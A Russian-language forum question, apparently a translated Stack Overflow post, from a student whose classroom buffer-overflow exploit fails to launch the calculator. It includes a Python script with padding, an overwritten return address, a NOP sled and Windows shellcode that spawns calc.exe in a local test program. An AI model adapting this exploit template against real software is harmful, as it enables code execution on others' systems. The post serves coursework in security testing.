Для пентестирования переполнения буфера шелл-код Calculator.exe не будет работать внутри файла Python. ⇐ Python

[Anonymous]

Я пытаюсь провести пентест Переполнение буфера, и идея состоит в том, чтобы в конечном итоге запустить калькулятор. После того, как все сделано правильно, например, при вычислении необходимых байтов для переполнения буфера и достижения eip, и фактического ввода адреса esp в мою полезную нагрузку , как показано в моем коде Python (и да, это в обратном порядке) , калькулятор вообще не работает. Шелл-код был предоставлен моим профессором, и сокурсники могут запустить калькулятор, просто запустив код Python, без фактического ввода реального адреса, необходимого для атаки. Итак, мне интересно, в чем моя проблема.
Может ли это быть что-то простое, например, функция защиты ОС?
Это код Python, используется как вредоносный код.

Код: Выделить всё

from subprocess import Popen, PIPE
payload = b"\xc4"* 62
payload += b"\x87\xc0\xbc\x76"
payload += (b"\x90\x90\x90\x90\x90\x90\x90\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
b"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
b"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75"
b"\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
b"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
b"\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53"
b"\x53\x53\x53\x53\x52\x53\xff\xd7") # execute calc.exe

p = Popen(["overflow.exe"], stdout=PIPE, stdin=PIPE)
p.communicate(payload)

Для дополнительной информации:
мой esp-адрес — 0x76bcc087
и мне нужно 62 байт, чтобы достичь eip (рассчитывается mona.py в dbg)

Подробнее здесь: https://stackoverflow.com/questions/790 ... k-inside-a